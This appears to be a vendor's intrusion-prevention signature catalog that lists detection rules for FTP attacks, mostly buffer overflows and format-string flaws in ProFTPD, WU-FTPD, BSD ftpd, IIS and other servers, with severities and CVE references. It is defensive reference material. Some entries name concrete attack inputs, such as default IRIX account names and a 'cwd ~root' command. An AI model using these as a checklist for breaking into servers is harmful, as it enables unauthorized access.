FTP_CS-BOF-Mkd-6

About this situation: Mkd buffer overflow against x86 linux
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, WU-FTPD, ProFTPD, BeroFTPD, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BOF-ProFTPD-WU-FTPD
Description:
Back to top

FTP_CS-BOF-ProFTPD-2

About this situation: ProFTPD buffer overflow on x86 Linux
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, ProFTPD, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BOF-ProFTPD-WU-FTPD
Description:
Back to top

FTP_CS-BOF-ProFTPD-3

About this situation: ProFTPD buffer overflow on x86 Linux
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, ProFTPD, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BOF-ProFTPD-WU-FTPD
Description:
Back to top

FTP_CS-BOF-ProFTPD-Pro

About this situation: ProFTPD on Linux x86 mkd Buffer Overflow (pro.c)
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, ProFTPD, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BOF-ProFTPD-WU-FTPD
Description: CVE References: CVE-1999-0911
Back to top

FTP_CS-BolinTech-Dream-FTP-Server-Format-String

About this situation: An attempt to exploit a BolinTech Dream FTP Server Format String vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, DreamFTP, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: BolinTech-Dream-FTP-Server-Format-String
Description:
Back to top

FTP_CS-BSD-Ftpd-Directory-Name-Buffer-Overflow

About this situation: Exploit attempt of NetBSD's ftpd buffer overflow detected.
Context: FTP Client Stream
Severity: 7
Tags: NetBSD, Any Hardware, BSD ftpd, CVE2006, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-158-2032
Vulnerability: FTP-BSD-Ftpd-Directory-Name-Buffer-Overflow
Description:
Back to top

FTP_CS-Bsdftpd-One-Byte-BOF-Mkd

About this situation: Multiple MKD commands with binary arguments detected
Context: FTP Client Stream
Severity: 10
Tags: BSD, Any Hardware, BSD ftpd, CVE2001, BSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: BSD-Ftpd-Off-By-One-BOF
Description:
Back to top

FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-1

About this situation: Bsdftpd mkd BOF (ftpexp.c)
Context: FTP Client Stream
Severity: 7
Tags: BSD, x86, BSD ftpd, CVE2001, BSD not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: BSD-Ftpd-Off-By-One-BOF
Description: CVE References: CVE-2001-0053
Back to top

FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-2

About this situation: Bsdftpd mkd BOF (obsd-ftpd.c)
Context: FTP Client Stream
Severity: 10
Tags: OpenBSD, Any Hardware, BSD ftpd, CVE2001, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: BSD-Ftpd-Off-By-One-BOF
Description: CVE References: CVE-2001-0053
Back to top

FTP_CS-Cd-BOF-Linux-Mkd

About this situation: Mkd FTP command with linux/x86 shellcode
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, WU-FTPD, ProFTPD, BeroFTPD, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BOF-ProFTPD-WU-FTPD
Description:
Back to top

FTP_CS-Cesar-FTP-Mkd-Command-Buffer-Overflow

About this situation: An attempt to exploit a Cesar FTP Mkd Command Buffer Overflow vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Cesar FTP, CVE2006, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-740-5211
Vulnerability: Cesar-FTP-Mkd-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Cisco-IOS-FTP-Mkd-BOF

About this situation: Detects attack exploiting IOS Ftp server
Context: FTP Client Stream
Severity: 10
Tags: Cisco IOS, Any Hardware, CVE2007, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-168-2032
Vulnerability: FTP-Cisco-Mkd-Buffer-Overflow
Description:
Back to top

FTP_CS-Cisco-IOS-FTP-Mkd-BOF-2

About this situation: Detects attack exploiting IOS Ftp server
Context: FTP Client Stream
Severity: 10
Tags: Cisco IOS, Any Hardware, CVE2007, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Cisco-Mkd-Buffer-Overflow
Description:
Back to top

FTP_CS-Crob-RMD-Command-Buffer-Overflow

About this situation: Buffer overflow exploit against Crob FTP server
Context: FTP Client Stream
Severity: 10
Tags: Windows, x86, Crob FTP Server, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Crob-RMD-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Cwd-Home-Solaris-Information-Disclosure

About this situation: FTP command cwd ~
Context: FTP Client Stream
Severity: 2
Tags: Solaris, Any Hardware, Solaris ftpd, CVE2001, Solaris not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Solaris-Globbing-Vulnerability
Description:
Back to top

FTP_CS-Cwd-Root-System-Compromise

About this situation: FTP command cwd ~root executed
Context: FTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, Generic FTP server, CVE1999, Unix not specific, Generic FTP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Cwd-Root-System-Compromise
Description:
Back to top

FTP_CS-Cwd-With-Suspicious-Argument

About this situation: A CWD command argument contained shellcode like string
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Description:
Back to top

FTP_CS-Default-IRIX-Account-4dgifts

About this situation: Attempted login via default account 4Dgifts
Context: FTP Client Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Vulnerability: Default-User-And-Password
Description:
Back to top

FTP_CS-Default-IRIX-Account-Ezsetup

About this situation: Attempted login via default account EZsetup
Context: FTP Client Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Vulnerability: Default-User-And-Password
Description:
Back to top

FTP_CS-Default-IRIX-Account-Guest

About this situation: Attempted login via default account guest
Context: FTP Client Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Vulnerability: Default-User-And-Password
Description:
Back to top

FTP_CS-Default-IRIX-Account-OutOfBox

About this situation: Attempted login via default account OutOfBox
Context: FTP Client Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Vulnerability: Default-User-And-Password
Description:
Back to top

FTP_CS-File-Globbing-Attack

About this situation: FTP file globbing
Context: FTP Client Stream
Severity: 10
Tags: Unix, Any Hardware, WU-FTPD, CVE2001, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-File-Globbing-Generic
Description:
Back to top

FTP_CS-FileCOPA-List-Command-Buffer-Overflow

About this situation: Buffer overflow exploit against FileCOPA FTP Server
Context: FTP Client Stream
Severity: 7
Tags: Windows, x86, FileCOPA FTP Server, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-FileCOPA-List-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-FileZilla-FTP-Server-Denial-of-Service

About this situation: An attempt to exploit a FileZilla FTP Server Denial of Service vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, FileZilla FTP Server, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: FileZilla-FTP-Server-Denial-of-Service
Description:
Back to top

FTP_CS-FreeBSD-BOF-Glob

About this situation: Buffer overflow exploit against FreeBSD FTP server
Context: FTP Client Stream
Severity: 10
Tags: Linux, Any Hardware, BSD ftpd, CVE2001, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BSD-Ftpd-Glob-Buffer-Overflow
Description:
Back to top

FTP_CS-FreeBSD-BOF-Glob-2

About this situation: Buffer overflow exploit against FreeBSD FTP server
Context: FTP Client Stream
Severity: 10
Tags: Linux, Any Hardware, BSD ftpd, CVE2001, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BSD-Ftpd-Glob-Buffer-Overflow
Description:
Back to top

FTP_CS-FreeBSD-BOF-Glob-3

About this situation: Buffer overflow exploit against FreeBSD FTP server
Context: FTP Client Stream
Severity: 10
Tags: Linux, Any Hardware, BSD ftpd, CVE2001, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BSD-Ftpd-Glob-Buffer-Overflow
Description:
Back to top

FTP_CS-Freeftpd-User-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FreeFTPD Project FreeFTPD detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FreeFTPd, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Freeftpd-User-Name-Buffer-Overflow
Description:
Back to top

FTP_CS-GlobalSCAPE-Secure-FTP-Server-Buffer-Overflow

About this situation: Buffer overflow vulnerability in GlobalSCAPE Secure FTP Server
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, GlobalSCAPE, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: GlobalSCAPE-Secure-FTP-Server-Buffer-Overflow
Description:
Back to top

FTP_CS-Golden-FTP-Server-RNTO-BOF

About this situation: Attempt to exploit a buffer overflow in Golden FTP server
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Golden FTP Server, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-169-2032
Vulnerability: Golden-FTP-Server-RNTO-BOF
Description:
Back to top

FTP_CS-Golden-FTP-Server-User-Command-BOF

About this situation: Long user name buffer overflow vulnerability in GoldenFTP
Context: FTP Client Stream
Severity: 10
Tags: Windows, x86, Golden FTP Server, CVE2005, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-986-5242
Vulnerability: Golden-FTP-Server-User-Command-BOF
Description:
Back to top

FTP_CS-GuildFTPd-Remote-Buffer-Overflow

About this situation: An attempt to exploit a GuildFTPd Remote Buffer Overflow vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, GuildFTPd, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: GuildFTPd-Remote-Buffer-Overflow
Description:
Back to top

FTP_CS-Hd-Soft-Windows-FTP-Server-Format-Strings

About this situation: HD Soft's Windows FTP Server format string vulnerability
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, HD Soft's Windows FTP Server, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Hd-Soft-Windows-FTP-Server-Format-Strings
Description:
Back to top

FTP_CS-HTTPDX-TOLOG-Function-Format-String

About this situation: An attempt to exploit an HTTPDX TOLOG Function Format String vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Windows XP SP3, Any Hardware, HTTPDX HTTP Server, CVE2009, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: HTTPDX-TOLOG-Function-Format-String
Description:
Back to top

FTP_CS-IIS-DoS-Wildcard

About this situation: IIS wildcard denial of service
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IIS 5.0, MS2001, CVE2001, Windows not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-250-3038
Vulnerability: IIS-Ftpd-Wildcard-Expansion-DoS
Description:
Back to top

FTP_CS-IIS-Nlst-BOF

About this situation: IIS NLST remote buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IIS 5.0, IIS 5.1, IIS 6.0, MS2009-10, MS1999, CVE1999, CVE2009, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-241-3038
Vulnerability: IIS-List-Argument-Heap-BOF
Microsoft-IIS-FTP-Server-Nlst-Buffer-Overflow
Description:
Back to top

FTP_CS-Ipswitch-WS_FTP-Server-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ipswitch WS_FTP Server detected
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, WS_FTP Server, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Ipswitch-WS_FTP-Server-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in KarjaSoft Sami FTP Server detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, KarjaSoft Sami FTP Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-546-5211
Vulnerability: Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Long-Dele-Command-Detection

About this situation: Long DELE command detected in an FTP session, possible buffer overflow exploit
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic FTP server, CVE2005, Any Operating System not specific, Generic FTP server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-169-2032
Vulnerability: Argosoft-FTP-Server-Dele-Command-BOF
Description:
Back to top

FTP_CS-Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Information Server detected
Context: FTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, IIS 5.0, IIS 5.1, IIS 6.0, IIS 7.0, MS2009-10, CVE2009, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521
Description:
Back to top

FTP_CS-Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Information Services detected
Context: FTP Client Stream
Severity: 2
Tags: Windows 7, Windows 2008 R2, Any Hardware, IIS 7.5, MS2011-02, CVE2010, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-374-4219
Vulnerability: Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow
Description:
Back to top

FTP_CS-Microsoft-Windows-FTP-Service-Status-Command-Buffer-Overflow

About this situation: Exploit attempt of Windows FTP service buffer overflow detected.
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2002, CVE2002, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Microsoft-Windows-FTP-Service-Status-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-MKDIR-With-Suspicious-Argument

About this situation: An mkdir command argument contained shellcode like string
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Description:
Back to top

FTP_CS-mySCADA-myPRO-7-Hardcoded-Credentials

About this situation: An attempt to use mySCADA myPRO 7 hardcoded credentials detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, mySCADA myPRO, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: mySCADA-myPRO-7-Hardcoded-Credentials
Description:
Back to top

FTP_CS-Nessus-Vulnerability-Scanner-Usage

About this situation: Detects Nessus vulnerability scanner usage
Context: FTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

FTP_CS-Non-Ascii-Command-Argument

About this situation: The FTP command argument contained non-ascii characters
Context: FTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-169-2032
Last changed: sgpkg-ips-249-3038
Description:
Back to top

FTP_CS-Non-FTP-Protocol-Seen-In-FTP-Port

About this situation: An attempt to send non-FTP data to FTP port has been detected.
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1528-5242
Description:
Back to top

FTP_CS-Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: FTP Client Stream
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2010, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow
Description:
Back to top

FTP_CS-Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: FTP Client Stream
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2010, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-299-4219
Last changed: sgpkg-ips-1141-5242
Vulnerability: Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow
Description:
Back to top

FTP_CS-Oversized-List-Argument

About this situation: A Buffer Overflow attack using oversized LIST argument
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS1999, CVE1999, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: IIS-List-Argument-Heap-BOF
FTP-Wftpd-Long-Argument-Buffer-Overflow
Description:
Back to top

FTP_CS-Oversized-List-Argument-Buffer-Overflow

About this situation: Too long directory name causes buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, x86, WhitSoft SlimFTPd, MS1999, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-169-2032
Last changed: sgpkg-ips-169-2032
Vulnerability: IIS-List-Argument-Heap-BOF
FTP-SlimFTPd-List-Buffer-Overflow
Description:
Back to top

FTP_CS-Oversized-MKDIR-With-Suspicious-Argument

About this situation: An oversized mkdir command argument contained non-ascii characters
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-249-3038
Last changed: sgpkg-ips-249-3038
Description:
Back to top

FTP_CS-Oversized-Nlst-Argument

About this situation: A Buffer Overflow attack using oversized NLST argument
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, CVE2004, CVE2008, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: FTP-Wftpd-Long-Argument-Buffer-Overflow
WinFTP-Nlst-Denial-of-Service
Description:
Back to top

FTP_CS-Oversized-Pass-With-Suspicious-Argument

About this situation: An oversized mkdir command argument contained non-ascii characters
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2006, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-249-3038
Last changed: sgpkg-ips-337-4219
Vulnerability: Golden-FTP-Server-Buffer-Overflow
Description:
Back to top

FTP_CS-Oversized-Stat-Argument

About this situation: A Buffer Overflow attack using oversized STAT argument
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: FTP-Wftpd-Long-Argument-Buffer-Overflow
Description:
Back to top

FTP_CS-Oversized-Stat-With-Suspicious-Argument

About this situation: An oversized STAT command argument contained non-ascii characters
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-249-3038
Last changed: sgpkg-ips-249-3038
Description:
Back to top

FTP_CS-Oversized-User-Buffer-Overflow

About this situation: Too long username causes buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, x86, 3Com 3CDaemon, CVE2005, CVE2006, CVE2012, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-988-5242
Vulnerability: FTP-3Com-3CDaemon-Username-Buffer-Overflow
Karjasoft-Sami-FTP-Server-2.0.1-Username-Buffer-Overflow
SR10-FTP-Server-Username-Buffer-Overflow
Karjasoft-Sami-FTP-Server-2.0.2-Username-Buffer-Overflow
Description:
Back to top

FTP_CS-Password

About this situation: Detects FTP passwords
Context: FTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Usage
Description:
Back to top

FTP_CS-Pinkslip-Bot-Traffic

About this situation: PinkSlip bot traffic detected
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Pinkslip-Bot
Description:
Back to top

FTP_CS-ProFTPD-DoS-Stat

About this situation: ProFTPD Stat DoS
Context: FTP Client Stream
Severity: 2
Tags: Linux, Any Hardware, ProFTPD, Linux not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-ProFTPD-Input-Validation-DoS
Description:
Back to top

FTP_CS-ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ProFTPD detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ProFTPD, CVE1999, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-374-4219
Vulnerability: ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow
Bisonware-FTP-Server-Buffer-Overflow
Description:
Back to top

FTP_CS-ProFTPD-Mod-Copy-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in ProFTPd detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ProFTPD, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: ProFTPD-Mod-Copy-Arbitrary-File-Upload
Description:
Back to top

FTP_CS-ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying

About this situation: An attempt to exploit a vulnerability in ProFTPD detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ProFTPD, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Vulnerability: ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying
Description:
Back to top

FTP_CS-ProFTPD-Snprintf

About this situation: ProFTPD snprinft exploit
Context: FTP Client Stream
Severity: 10
Tags: Linux, POWER, ProFTPD, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-ProFTPD-Snprintf
Description:
